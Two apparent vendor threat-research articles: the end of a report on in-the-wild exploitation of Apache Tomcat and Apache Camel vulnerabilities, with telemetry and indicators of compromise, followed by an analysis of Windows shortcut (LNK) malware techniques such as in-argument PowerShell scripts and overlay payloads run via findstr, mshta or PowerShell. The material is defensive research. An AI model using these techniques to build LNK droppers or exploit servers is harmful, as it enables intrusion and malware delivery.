Line graph depicting the number of triggers over time. The graph shows dates on the x-axis from 2025-03-16 to 2025-03-30, with trigger numbers increasing initially, peaking mid-period, and then decreasing by the end date. Unit 42 and Palo Alto Networks logo lockup.
Figure 17. Detection of exploit activity in March 2025.

Exploit Attempt Payloads

We captured payloads that attackers have used so far in these scans, probes and exploit attempts.

Figure 18 shows an example of the initial HTTP PUT request for an exploit attempt of Apache Tomcat vulnerability CVE-2025-24813. This type of activity is a scan or probe to determine if a server is running a vulnerable version of Tomcat.

A screenshot of an HTTP PUT request showing headers and partial Java code related to HashMap and URL classes. Some information is redacted for privacy.
Figure 18. HTTP PUT request for exploit of CVE-2025-24813.

If successful, the exploit in Figure 20 results in the victim server attempting to contact an out-of-band application security testing (OAST) server.

Figure 19 shows the HTTP request for an exploit of Apache Camel vulnerability CVE-2025-27636. If successful, this would cause the server to run an echo command. This is a way to test a server running Apache Camel if an attacker already has access and can see the results of an echo command.

Screenshot of an HTTP GET request with visible headers including Host, User-Agent set to curl/7.61.1, and Accept being any type, followed by a command execution attempt. Some information has been redacted.
Figure 19. HTTP request from Apache Camel exploit for CVE-2025-27636.

Figure 20 shows the HTTP request for an exploit of Apache Camel vulnerability CVE-2025-29891. Like the exploit attempt for Apache Tomcat shown in Figure 20, this Apache Camel exploit would ask the vulnerable server to contact an OAST server.

Screenshot showing a GET and POST request example with the URL partially visible as "http://". Some of the information is redacted.
Figure 20. HTTP request from Apache Camel exploit for CVE-2025-29891.

CVE-2025-24813 Exploit in the Wild

Since we released our coverage for this vulnerability, we have observed 7,859 exploit attempts for the Apache Tomcat vulnerability CVE-2025-24813.

In this section, we analyze this activity from two perspectives: the length of the session name and the value of the Content‑Range header.

Tomcat Session Name Length

As noted in our earlier analysis, exploits for CVE-2025-24813 use a name appended by .session in the initial HTTP request. This .session file contains the code the vulnerable host will run if an exploit is successful.

Most of the prefixes in these session names use fewer than 10 characters. Our telemetry reveals that the most common prefixes use six characters as a session name as Figure 21 shows.

Bar chart displaying the number of characters in session names. The x-axis represents the count of session names, and the y-axis lists ranges of character counts from less than 4 to 10 or more. Unit 42 and Palo Alto Networks logo lockup.
Figure 21. Trends on length of the session name in CVE-2025-24813 exploit attempts.

We noted this pattern length of six characters in more than 6,000 detections. Why would the vast majority of this exploit activity use a session name with a six-character string? This activity pattern correlates with the Content-Range header.

Tomcat Content-Range Header

As noted in our Tomcat source code analysis for CVE-2025-24813, the HTTP header for Content-Range is an important factor in this vulnerability. Figure 22 groups the different Content-Range values.

A horizontal bar chart showing counts of different byte ranges, with a varying count for each category. Unit 42 and Palo Alto Networks logo lockup.
Figure 22. Trends on Content-Range values seen in CVE-2025-24813 exploit attempts.

Our telemetry reveals we noted the header Content-Range: bytes 0-452/457 in more than 6,000 detections. This finding correlates with the six-character session name.

These two findings match the pattern of a CVE-2025-24813 template for the Nuclei Scanner by ProjectDiscovery available on GitHub. Figure 23 highlights the correlation with our findings.

Screenshot of a text editor displaying code with highlighted lines related to an HTTP session and Python variables. Three sections are emphasized in red boxes. These are the filename, PUT and Content-range.
Figure 23. Segment from the CVE-2025-24813 template in the nuclei-templates GitHub repository.

This means that a large number of the CVE-2025-24813 scans we've seen so far have used the Nuclei Scanner. This makes sense, since Nuclei is a freely available scanner under the MIT license that anyone can use. Both attackers and defenders would likely use this scanner and template to check for the vulnerability.

Conclusion

Vulnerable Apache Tomcat instances that allow write directory (disabled by default) and partial PUT (enabled by default) are vulnerable to CVE-2025-24813. Vulnerable Apache Camel instances that use specific components are vulnerable to CVE-2025-27636 and CVE-2025-29891.

These vulnerabilities present a significant security risk due to their critical flaws. Attackers can exploit them through specifically crafted HTTP requests.

Such exploits not only enable potential remote code execution, but they also pose broader threats such as data breaches and lateral movement within the network. The use of Nuclei Scanner to check for this vulnerability underscores the ease with which less-skilled adversaries can leverage these vulnerabilities, making immediate action crucial.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

CVE-2025-24813

Source IP addresses seen for CVE-2025-24813

  • 54.193.62[.]84
  • 96.113.95[.]10
  • 209.189.232[.]134
  • 162.241.149[.]101
  • 167.172.67[.]75
  • 100.65.135[.]245
  • 138.197.82[.]147
  • 123.16.159[.]102
  • 193.53.40[.]18
  • 91.208.206[.]203
  • 212.56.34[.]85
  • 195.164.49[.]70
  • 185.91.127[.]9

Activity URLs - CVE-2025-24813

  • PUT /qdigu/session
  • PUT /UlOLJo.session

SHA256 Hash of Payload Samples

  • 6a9a0a3f0763a359737da801a48c7a0a7a75d6fa810418216628891893773540
  • 6b7912e550c66688c65f8cf8651b638defc4dbeabae5f0f6a23fb20d98333f6b

CVE-2025-27636, CVE-2025-29891

Source IP Addresses Seen for CVE-2025-27636, CVE-2025-29891

  • 30.153.178[.]49
  • 54.147.173[.]17
  • 54.120.8[.]214
  • 139.87.112[.]169
  • 139.87.112[.]115
  • 64.39.98[.]52
  • 139.87.112[.]98
  • 139.87.113[.]24
  • 64.39.98[.]139
  • 54.96.66[.]57
  • 138.197.82[.]147
  • 22.85.196[.]34
  • 64.39.98[.]245
  • 64.39.98[.]9
  • 54.120.8[.]207
  • 130.212.99[.]156
  • 139.87.112[.]121
  • 139.87.113[.]26

Activity Headers for CVE-2025-27636, CVE-2025-29891

  • CAmelHttpResponseCode
  • CAmelExecCommandExecutable
  • CAmelExecCommandArgs
  • CAmelBeanMethodName

Additional Resources

 

Windows Shortcut (LNK) Malware Strategies

Posted on by Ashutosh Chitwadgi

Executive Summary

Attackers are increasingly exploiting Windows shortcut (LNK) files for malware delivery. Our telemetry revealed 21,098 malicious LNK samples in 2023, which surged to 68,392 in 2024. In this article, we present an in-depth investigation of LNK malware, based on analysis of 30,000 recent samples.

Windows shortcut files use the .lnk file extension and function as a virtual link that allows people to easily access other files without having to navigate through multiple folders on a Windows host. The flexibility of LNK files makes them a powerful tool for attackers, as they can both execute malicious content and masquerade as legitimate files to deceive victims into unintentionally launching malware.

Our research indicates LNK malware falls into four categories:

  • Exploit execution
  • File on disk execution
  • In-argument scripts execution
  • Overlay execution

We explain each of these techniques in detail with examples to help readers better understand how attackers abuse LNK files in the real world.

As LNK files are becoming a more popular component of malware distribution, everyone should be familiar with this threat, not only cybersecurity professionals but also regular Windows users. Use caution when handling unknown LNK files, especially if you have downloaded them from the internet.

LNK malware files can have familiar icons or names that mimic trusted applications or documents to trick users into opening them. To identify such threats, carefully examine the file's properties, especially its target location, by right-clicking on the LNK file and selecting “Properties.” If the target seems unusual (e.g., pointing to unknown directories or being abnormally long, indicating suspicious arguments), avoid executing the file.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Next-Generation Firewall with cloud-delivered security services including Advanced WildFire.
  • Prisma Access devices with cloud-delivered security services including Advanced WildFire.
  • Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time, relevant to exploits against the vulnerability described below.
  • Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Microsoft Windows

LNK Files Explained

Windows uses LNK files, also called shell links or shortcuts, to create quick access links to files, folders or applications at different locations. Figure 1 shows examples of LNK file icons, which people typically place on their desktop. These icons are easily identifiable because of the small arrow in the bottom-left corner.

An image displaying icons for various applications and files: a folder labeled "my photos," VLC media player, a PDF titled "My Document," Firefox browser, a text document named "note," and Microsoft Edge browser.
Figure 1. Examples of icons for Windows LNK files.

LNK files allow people to start a program without having to locate the executable, which is often stored deep in a directory structure in locations like C:\Program Files\[Program Name]\[xxx].exe. An LNK file can also point to a non-executable file, like a PDF document or JPEG image, where double-clicking on the LNK file is equivalent to double-clicking on the actual file.

While LNK files have an .lnk file extension that appears in command-line tools, Windows will never show an .lnk file extension on the Windows desktop or in File Explorer. For example, an LNK file named Invoice.lnk will only show Invoice as the filename.

Someone can create an LNK file using different methods in Windows. The easiest method is to do the following:

  • In File Explorer, right-click on the item to bring up a menu
  • Select “Show More Options” from the menu if using Windows 11
  • Select “Create shortcut”

This brings up a Create Shortcut window to select the location of the desired item.

This creates an LNK that has the location of the original file. Alternatively, people can copy a file and use the “Paste shortcut” option that will paste an LNK pointing to the item.

People can right-click on an item, use the “Send to” option and select "Desktop (create shortcut)" to create an LNK file.

Finally, people can also right-click in the background of File Explorer and select “New” and "Shortcut." This brings up a Create Shortcut window to select the location of the desired item.

Figure 2 illustrates the LNK file for Microsoft Edge with the default Windows installation.

Screenshot of the Microsoft Edge Properties dialog box showing details in the Shortcut tab. The target field is highlighted, displaying the application path 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'.
Figure 2. LNK file for Microsoft Edge.

Figure 2 shows common properties and fields of an LNK file. As highlighted, the most important field is the Target field, where the value is set to:

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

Consequently, this LNK file enables someone to start Microsoft Edge.

While LNK files may seem simple at first glance, their flexibility lends to their abuse in several ways. Let us look at a malicious sample in Figure 3.

Screenshot of an open 'Properties' window on a Windows operating system, displaying settings for a shortcut to a PowerShell script named 'tempfile.bat'. The 'Target' field shows a command line to run the script, and the 'Start in' field specifies a directory path.
Figure 3. Properties of a malicious LNK sample.

The LNK format can also use command-line arguments to execute targets (thus the name shell link). As shown in the Target field in Figure 3 above, attackers can also use these command-line arguments to download and execute malicious code.

Moreover, the icons of LNK files are customizable, which can lure people into clicking on the malicious LNK files. In Figure 3, while the LNK is pointing to a batch file, the LNK icon appears as a text file.

The PASSWORD_HERE.txt.lnk filename appears as PASSWORD_HERE.txt on the desktop or in File Explorer. This and the text file icon of the LNK file can trick someone into believing this is an actual text file containing a password and double-clicking the file.

Important Structures for LNK Malware

LNK files have a binary file format, and Figure 4 shows their structure.

Diagram showing two blocks with labeled sections: the left block includes HEADER, LINKTARGET_IDLIST, LINKINFO, STRING_DATA, and EXTRA_DATA. The right block includes NAME_STRING, RELATIVE_PATH, WORKING_DIR, COMMAND_LINE_ARGUMENT, and ICON_LOCATION.
Figure 4. Structures of LNK malware.

In Figure 4, optional fields are wrapped in square brackets. Except for EXTRA_DATA, each of the structures starts with its size followed by the content. The STRING_DATA field consists of five sub-fields, two of which are essential for LNK malware.

Of note, the only field required for a valid LNK file is its header. Intuitively, a header-only LNK file is most likely harmless because it will neither have the ability to execute any items nor resolve any paths. Based on our empirical analysis of 30,000 malicious LNK samples, an LNK file containing only a header is likely to be benign.

In LNK files, three fields from Figure 4 are directly related to the target resolution and execution, which are highlighted with a green background:

  • LINKTARGET_IDLIST: A list of shell items (See Additional Resources) specifying the target.
  • RELATIVE_PATH: The relative path of the target with respect to the LNK location.
  • COMMAND_LINE_ARGUMENTS: Arguments passed to the target.

Most malicious LNK files can be identified by examining these three fields, as supported by our analysis of 30,000 malicious LNK files. Figure 5 shows the percentage rate of various LNK structures from malicious LNK files.

Bar chart showing percentages for different entities: LTList at 99.53%, RP at 75.49%, CLA at 35.51%, LTList or RP at 99.56%, LTList or CLA at 99.99%, RP or CLA at 99.95%, and Either of 3 at 100%.
Figure 5. Distribution of indicators for the three important structures from 30,000 malicious LNK files.

Shown in Figure 5 as LTList, LINKTARGET_IDLIST is almost always present, appearing in 99.53% of the malicious LNK files. This is the major field to locate the target.

Shown as RP in Figure 5, RELATIVE_PATH is also common, appearing in 75.49% of the malicious LNK files. RELATIVE_PATH locates the target whenever LINKTARGET_IDLIST is missing or invalid.

Shown as CLA in Figure 5, the COMMAND_LINE_ARGUMENTS field is less common, appearing in 35.52% of the malicious LNK files. This field can be used to pass arguments and carry malicious scripts. Figure 5 shows the percentage of malicious LNK files containing at least one of these elements is remarkably high.

To better understand these three fields in malicious LNK files, the following sections review them in detail.

LINKTARGET_IDLIST

The LINKTARGET_IDLIST field has the following structure:

Field Size Shell Item [0] Shell Item [1] Shell Item [2] . . .

LINKTARGET_IDLIST specifies the location of the target (i.e., the item an LNK file is pointing to). As the field name implies, its structure is a list of Windows shell items. Figure 6 illustrates the LINKTARGET_IDLIST structure of an LNK file for Microsoft Edge.

Screenshot of a computer interface displaying a list of system directory paths including 'My Computer', 'Program Files (x86)', 'Microsoft', and 'Edge' within an application interface. The columns are titled Name, Value, Start, and Size.
Figure 6. LINKTARGET_IDLIST structure of a Microsoft Edge LNK shown in 010 Editor.

This field contains several types of Window shell items, but the most common ones used in LNK files are ROOT, VOLUME and FILE ENTRY:

  • A ROOT item is almost always present and contains a CLSID (i.e., GUID) of a shell folder, acting as the starting point for the path to the target. IDList[0] is ROOT in Figure 6.
  • A VOLUME item is often used to specify the disk volume (e.g., the drive letter in Windows) of the path. It can also be used to specify a shell folder by its CLSID. IDList[1] is VOLUME in Figure 6.
  • FILE ENTRY items can present a single path component of the target. IDList[1] through -IDList[6] are all FILE ENTRY items.

In summary, a valid LINKTARGET_IDLIST will usually have a chain of shell items consisting of ROOT, VOLUME and/or FILE ENTRY items that can precisely specify a target.

RELATIVE_PATH

The RELATIVE_PATH has the following structure:

Number of Characters RELATIVE_PATH STRING

RELATIVE_PATH is a part of the STRING_DATA field, which is either a plaintext ASCII or a Unicode string. It is the relative path of the target with respect to the LNK file, and it resolves the target if the LINKTARGET_IDLIST fails. Typical cases are when LINKTARGET_IDLIST specifies an invalid target or the LINKTARGET_IDLIST is completely missing.

COMMAND_LINE_ARGUMENTS

The COMMAND_LINE_ARGUMENTS has the following structure:

Number of Characters COMMAND_LINE_ARGUMENT STRING

COMMAND_LINE_ARGUMENTS is another component of the STRING_DATA field. It supplies the command-line arguments for an executable target. This field is either a plaintext ASCII or a Unicode string. This value is appended to the path of the resolved target to form a complete command to execute.

LNK Malware Categories and Examples

Attackers can leverage LNK files in various ways, which we can classify into four categories:

  • LNK exploits
  • Malicious file execution
  • In-argument script execution
  • Overlay content execution

LNK Exploits

The first major type of LNK malware is an exploit. These are corrupted LNK binaries designed to exploit Windows.

Since Windows processes the LNK file as soon as it opens the containing folder, these exploit-based LNK files can exploit vulnerabilities in OS components. As Microsoft patched modern Windows versions to prevent these exploits, these types of malicious LNK samples have become less common. However, because these samples usually cause parsing problems during malware analysis, we should still understand how to distinguish an exploit-based LNK file from other corrupted samples.

In our observations of exploit-based LNK malware, the most common vulnerability targeted is CVE-2010-2568, which attackers can exploit with two variants of exploits.

Variant 1

The exploit of the first variant is in the ROOT (1) sub-field of LINKTARGET_IDLIST, specifically, the extension block (ExtraBlock) of the ROOT node. Figure 7 shows an example of this variant opened in 010 Editor.

A screenshot of a computer interface displaying a list of system properties, including "Size" highlighted in red within the "ExtraBlock" section. Other visible property names include "ShellLinkHeader," "IDList," and "Signature. The columns are titled Name, Value, Start, and Size.
Figure 7. LINKTARGET_IDLIST of an exploit-based LNK malware sample.

There are two anomalies. First, the presence of an extension block in a ROOT node is rare, so we would expect the size under slDLlist to be 20 bytes. Any size larger than 20 is suspicious. In Figure 7, this value is 55.

Second, the size of the ExtraBlock is very large compared to what we would see in a normal LNK file. In this case, the size of the ExtraBlock value is larger than the size of the ROOT node itself, which will trigger crashes. In Figure 7, this value is 57,312 bytes.

Variant 2

The indicator of compromise (IoC) of the first variant is in the VOLUME node of the LINKTARGET_IDLIST. Figure 8 shows a sample of this exploit variant opened in 010 Editor.

A screenshot of a computer interface displaying a list of system properties, focusing on an item named 'IDListSize' with a value highlighted in red, which reads '65280'. The columns are titled Name, Value, Start, and Size.
Figure 8. LINKTARGET_IDLIST of another exploit-based LNK malware sample.

The IDListSize value under LINKTARGET_IDLIST in this sample is notably larger than IDListSize values seen in valid LNK files. In this example, the value is longer than the size of the file. As shown in Figure 8, this value is 65,280 bytes, where the size of this sample is merely 198 bytes. This discrepancy can trigger crashes, or it can exploit vulnerabilities.

Attackers usually use this type of exploit-based LNK malware to open the Control Panel to bypass the allowed list of Control Panel files (known as the CPL allow list). In this example, under the VOLUME node, the CLSID is:

{21EC2020-3AEA-1069-A2DD-08002B30309D}

This is the CLSID for “All Control Panel Items.” We can find this CLSID in this LNK malware sample using a Hex editor and searching for the hex value shown in Figure 9.

Two rows of hexadecimal code displayed in blue and black backgrounds.
Figure 9. The CLSID value for “All Control Panel Items” is shown in an exploit-based LNK malware sample viewed in a Hex editor.

Malicious File Execution

Instead of containing malicious content, LNK malware can execute malicious files (either script or binary) that attackers have already saved to disk on the victim host. This type of LNK malware either points to a malicious file, or it points to a system target that can help execute a malicious file.

Malicious Targets

The goal of this type of LNK malware is simple: execute a malicious file on disk. Figure 10 shows a sample of this type of malware.

Screenshot of a computer's properties window highlighting two different files. The columns are titled Name, Value, Start, and Size.
Figure 10. Fields of an LNK malware sample that points to a malicious file.

This sample is designed to execute a malicious file named desktop.ini.exe in the user's Downloads directory. For this type of infection, the LNK file is not malicious itself, but it links to malicious content.

System Targets

LNK malware files often trigger malicious scripts or other files that cannot be directly executed. In such cases, the LNK file points to a Windows system tool (a system target) that can execute the malicious code.

Figure 11 shows the target from this type of malicious LNK sample.

Screenshot of a computer interface showing details of a file with the command line argument for a file named Video.3gp, along with other system path and file information.
Figure 11. Fields of an LNK malware sample that points to a system target.

This LNK sample uses wscript.exe to run a text file of encoded VBS script named Video.3gp located in the same directory as the LNK sample. In this case, without the malicious file passed as an argument, the LNK file by itself is not malicious. The content of Video.3gp would be malicious.

The choice of system target depends on the file type of the malicious content. For example, an LNK file's system target for a malicious DLL could be rundll32.exe. Our dataset indicates LNK malware most often uses the following system targets:

  • powershell.exe
  • cmd.exe
  • rundll32.exe
  • conhost.exe
  • wscript.exe
  • forfiles.exe
  • mshta.exe

In Figure 12, we broke down the most commonly used system targets from our dataset by percentage of overall system target occurrence.

Pie chart showing the distribution of executable file names in a dataset. PowerShell.exe accounts for 59.4% of the data, followed by cmd.exe at 25.7%. Other segments include conhost.exe, forfiles.exe, wscript.exe, mshta.exe, and a category labeled 'Others,' each making up less than 7% of the total. The Palo Alto Networks and Unit 42 lockup logo.
Figure 12. Percentages of system targets for malicious file execution.

System targets are also common when executing scripts hidden in arguments.

In-Argument Script Execution

The COMMAND_LINE_ARGUMENTS field can contain strings of any size, including a malicious script. By pointing the target of the LNK file to a script interpreter or a utility program capable of executing commands, an LNK file can execute the malicious script saved in the COMMAND_LINE_ARGUMENTS field.

The following are the common targets that attackers can use to execute malicious scripts.

Target 1: PowerShell or Command Prompt

The most common interpreters used by LNK malware of this type are the command prompt file cmd.exe and the PowerShell file powershell.exe. These are commonly included with Windows installations. In addition, they can indirectly invoke other system targets (e.g., start command in cmd.exe).

Based on our analysis, cmd.exe and powershell.exe collectively account for over 80% of the targets used for in-argument script execution by malicious LNK files.

To make the analysis harder, LNK malware of this type often adopts obfuscation. This obfuscation includes command assembling, command encoding, random escape character insertion and using Windows environment variables in the command.

Figure 13 shows an example of LNK malware with a PowerShell command to execute a malicious script in the COMMAND_LINE_ARGUMENTS field.

Screenshot of a computer interface showing details of entries for ShellLinkHeader, RELATIVE_PATH, COMMAND_LINE_ARGUMENTS, ICON_LOCATION, and sExtraData, highlighting malicious commands.
Figure 13. Fields of an LNK malware sample with a malicious PowerShell command in the COMMAND_LINE_ARGUMENTS field.

The sample in Figure 15 indirectly invokes PowerShell by executing cmd.exe. The full string for the malicious PowerShell script is Base64-encoded as shown in Figure 14.

An image displaying a long string of alphanumeric characters.
Figure 14. Base64-encoded PowerShell script from the sample in Figure 13.

When decoded, this Base64 string translates to the PowerShell script shown below in Figure 15.

Text depicting a command line interface command involving a GitHub URL a specific project, with specific settings.
Figure 15. Decoded PowerShell script from the malware.

Executing this LNK sample will download and execute a malicious DLL file. In Figure 15, the command rundll32 $das32r422, _entry@16 is suspicious, and analysts can confirm malicious activity by analyzing the DLL.

Target 2: Conhost

The Console Window Host (conhost) tool named conhost.exe manages and displays the input/output of command-line tools like cmd.exe. Conhost can be used as a parent process when executing commands to hide the execution of the malicious code from the user's eyes. We occasionally find malicious LNK files that use conhost.exe to execute scripts. Here is an example shown in Figure 16.

Screenshot of a computer interface showing details of entries highlighting two entries in the second and fourth rows.
Figure 16. Fields of an LNK malware sample using conhost.exe.

Figure 17 below shows the full COMMAND_LINE_ARGUMENTS value.

Screenshot displaying lines of code in a terminal with yellow text on a black background. The code includes various characters and hexadecimal values.
Figure 17. Malicious command-line script embedded in the COMMAND_LINE_ARGUMENTS from Figure 16.

This obfuscated command-line script assembles and executes JavaScript code. The deobfuscated JavaScript appears below in Figure 18.

Screenshot of a malicious code snippet.
Figure 18. Deobfuscated malicious JavaScript code.

At this point, an analyst can determine whether the file is malicious based on the domain or the content downloaded.

Target 3: Forfiles

The forfiles command in Windows is similar to the find command in UNIX. This command finds files based on naming patterns. It can also execute arbitrary commands by passing a /c argument, where forfiles will run a specified command on each file it finds.

Figure 19 shows an example of a malicious LNK file using forfiles.

Screenshot displaying a table with technical details multiple file paths within various fields such as Name, Value, Start, and Size. The second and fourth rows are highlighted.
Figure 19. Fields of an LNK malware sample using forfiles.

This LNK file runs forfiles to invoke a malicious PowerShell command saved in COMMAND_LINE_ARGUMENTS as shown below in Figure 20.

Screenshot of a PowerShell command.
Figure 20. The COMMAND_LINE_ARGUMENTS from Figure 16 to run an HTA file.

The PowerShell command runs a remote HTA file using mshta.exe.

Overlay Content Execution

We commonly find extra data appended after the supposed end of malicious LNK files. Since appending data to an LNK file will not cause parsing issues, another type of LNK malware appends malicious scripts or other types of payloads to legitimate LNK files. We call this data “overlay content.” Because Windows will ignore everything after the supposed end of the LNK file, this type of LNK malware must use a specially crafted COMMAND_LINE_ARGUMENTS field to detonate the scripts as desired.

Technique 1: Find / Findstr

Windows command-line utilities find and findstr are used to search for specific string patterns of text within files, similar to grep commands in UNIX. Malicious LNK can use this command to locate the accurate position of the malicious content in the overlay to ensure it executes malicious code properly.

Figure 21 shows an example of LNK malware where it uses the findstr command recursively to hide and execute the malicious code.

Screenshot of a file details table showing various columns like Name, Value, Start, and Size, highlighting the file name "2023_Annual_Report.pdf.lnk" in Adobe Acrobat PDF format.
Figure 21. Fields of an LNK malware sample using findstr.

This LNK malware is named 2023_Annual_Report.pdf.lnk, so that it will appear to be a PDF file to people who are not familiar with the extension options in Windows Explorer. The structure of this sample is shown below in Figure 22.

P1: LNK Content P2: Base64-Encoded PDF P3: Base64-Encoded Script

Figure 22. Structure of malicious LNK sample from Figure 21.

In Figure 22, the P2 and P3 sections are overlay content of the LNK malware sample.

In this sample, the COMMAND_LINE_ARGUMENTS field contains the command-line script shown in Figure 23.

Screenshot of a command line interface executing a script to open a PDF report named 'Annual_Report.pdf' with additional commands handling file paths and PowerShell settings.
Figure 23. A malicious command-line script in the COMMAND_LINE_ARGUMENTS field used to extract and decode overlay content from the LNK malware sample.

In the decoded script, findstr searches for the string CiRFcnJvckFjdGlvbl within this malicious LNK itself. This match will return the content in P3, which is an encoded PowerShell script. Figure 24 below shows the initial part of the decoded content.

A screenshot of computer code displayed on a blue background with white and yellow text, featuring Windows PowerShell syntax and various system commands.
Figure 24. Malicious script in P3 overlay content.

This script is malicious. It will download content from the attacker's server at pdf-online[.]top. Additionally, before executing the malicious content, this script will first decode and open the PDF file in P2. The PDF itself is not malicious, which Figure 25 shows.

USAID Shooting Guide document page focused on establishing shots for character reels. The page includes guidelines and key points on how to capture shots that create an emotional connection with viewers, featuring tips such as showing the subject in their environment and emphasizing the authenticity of the setting.
Figure 25. Embedded benign PDF file in the LNK malware sample using overlay content.

Although the sample executes a malicious PowerShell script, this findstr technique will work with other malicious content, such as a VBS or command-line script. In addition to script-based code, this technique can also work with malicious binary code that is Base64-encoded in overlay content.

Technique 2: Mshta

This is the second technique of overlay content. Attackers commonly use malicious HTML Application (HTA) files for different types of malware, and we also find HTA files used in LNK malware. Windows uses mshta.exe to run HTA content. As mshta.exe is a very forgiving interpreter, it will ignore everything in a file until it finds the HTA prologue tag hta:application.

When a malicious HTA file is appended as overlay content to an LNK file, there is no need to find out where the HTA content starts. Instead, a simple command will do the trick: mshta [name of malware].lnk. Figure 26 shows an example.

An image showing a computer file explorer window with a highlighted entry displaying the command line arguments for launching the movie Kingdom of the Planet of the Apes.
Figure 26. ​​Fields of an LNK malware sample using HTA overlay content.

This sample has the following structure, shown in Figure 27.

P1: LNK Content P2: HTA Script

Figure 27. Structure of the malicious LNK sample.

Figure 28 below shows the COMMAND_LINE_ARGUMENTS of this sample, which is just executing mshta, taking itself as the input of mshta.

Screenshot of code displaying the command line arguments for launching the movie Kingdom of the Planet of the Apes.
Figure 28. Malicious command-line script executing HTA overlay content.

Technique 3: PowerShell Commands and Intrinsics

PowerShell commands and intrinsics such as Select-String, Get-Content and .Substring can be used to find or extract content. The benefit of using PowerShell commands is that they can be encoded to evade detection.

Figure 29 shows an LNK malware example using this technique to execute a Base64-encoded PE file in the overlay.

A screenshot of a table containing details of a Microsoft Windows system process related to PowerShell. The table includes columns for shell name, value, and other specific attributes such as command line arguments and icon location.
Figure 29. Fields of an LNK malware sample using PowerShell for overlay content.

This sample has the following structure, shown in Figure 30.

P1: LNK Content P2: Base64-Encoded PE

Figure 30. Structure of malicious LNK sample shown in Figure 29.

The COMMAND_LINE_ARGUMENTS field in Figure 31 contains a PowerShell script with Base64-encoded content.

A screen capture showing a line of encoded PowerShell command script, featuring numerous characters in white on a black background.
Figure 31. Malicious PowerShell script with Base64-encoded content.

The Base64-encoded content translates to the text shown below in Figure 32.

Screenshot of a PowerShell script.
Figure 32. Decoded content used in the PowerShell script.

This command performs the following functions:

  1. Find a filename ending with .lnk
  2. Find the pattern BS:D using the command Select-String
  3. Decode the Base64-encoded content after the pattern BS:D
  4. Save the decoded content to a file under the environment's TEMP directory and execute the saved file using Start-Process command

Figure 33 below shows the only BS:D pattern in the LNK file.

Image showing a row of hexadecimal code with certain sections highlighted in red.
Figure 33. Start of overlay content in the LNK malware sample.

The ASCII text pattern immediately after BS:D is a very common Base64-encoded text for the first 3 bytes of an executable (PE) file (4d 5a 90). The content starting at TVqQ is the P2 overlay content, which is not part of the LNK content. Decoding this Base64 string yields a malicious PE file.

Comparison of Overlay Content Execution Techniques

These three types of overlay content execution techniques have different advantages. Specifically:

  • find/findstr: This technique is universal and easy to implement. It can use different patterns as delimiters, and it can support different kinds of payload. In addition, the find command can be obfuscated using standard script obfuscation techniques.
  • mshta: This technique is easy to implement, as mshta.exe is so tolerant that it will ignore all non-HTA content. Attackers effectively only need to invoke mshta to execute the LNK file itself. However, the payload must be an HTA script.
  • PowerShell command/intrinsics: While this technique is relatively complex to implement, it can use advanced obfuscation to hide or obscure the malicious payload in the overlay content.

These three techniques comprise about 95% of the techniques we have seen in our LNK malware dataset. Figure 34 shows this breakdown.

Donut chart displaying usage percentages of various command-line interfaces. 'find/findstr' commands are the most used at 48.3%, followed by 'mshta' at 28.1%, 'Powershell cmds' at 18.0%, and 'Others' at 5.6%. The chart includes logos for Palo Alto Networks and Unit 42.
Figure 34. Distribution of the overlay content execution techniques from LNK malware samples in our dataset.

The remaining 5.6% includes different techniques to locate and execute overlay content, including using fixed offset and executing a loader program. PowerShell’s capability enables an array of techniques for executing malicious content in the overlay, limited only by the attacker’s own imagination.

Conclusion

This article reviews four different types of LNK malware, providing fundamental information for LNK malware analysis. This information is not only valuable for threat analysts, but also useful for data analysts. All Windows users should examine any suspicious LNK files before double-clicking on them to ensure they are not malicious.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Next-Generation Firewall with cloud-delivered security services including Advanced WildFire.
  • Prisma Access devices with cloud-delivered security services including Advanced WildFire.
  • Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time, including exploits against CVE-2010-2568. Please see TIDs 33742, 54577 and 33351.
  • Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

The following are SHA256 hashes of the LNK malware samples reviewed in this article:

  • a90c87c90e046e68550f9a21eae3cad25f461e9e9f16a8991e2c7a70a3a59156
  • 08233322eef803317e761c7d380d41fcd1e887d46f99aae5f71a7a590f472205
  • 9d4683a65be134afe71f49dbd798a0a4583fe90cf4b440d81eebcbbfc05ca1cd
  • a89b344ac85bd27e36388ca3a5437d8cda03c8eb171570f0d437a63b803b0b20
  • 28fa4a74bbef437749573695aeb13ec09139c2c7ee4980cd7128eb3ea17c7fa8
  • fb792bb72d24cc2284652eb26797afd4ded15d175896ca51657c844433aba8a9
  • f585db05687ea29d089442cc7cfa7ff84db9587af056d9b78c2f7a030ff7cd3d
  • b2fd04602223117194181c97ca8692a09f6f5cfdbc07c87560aaab821cd29536
  • 86f504dea07fd952253904c468d83d9014a290e1ff5f2d103059638e07d14b09
  • ​​d1dc85a875e4fc8ace6d530680fdb3fb2dc6b0f07f892d8714af472c50d3a237
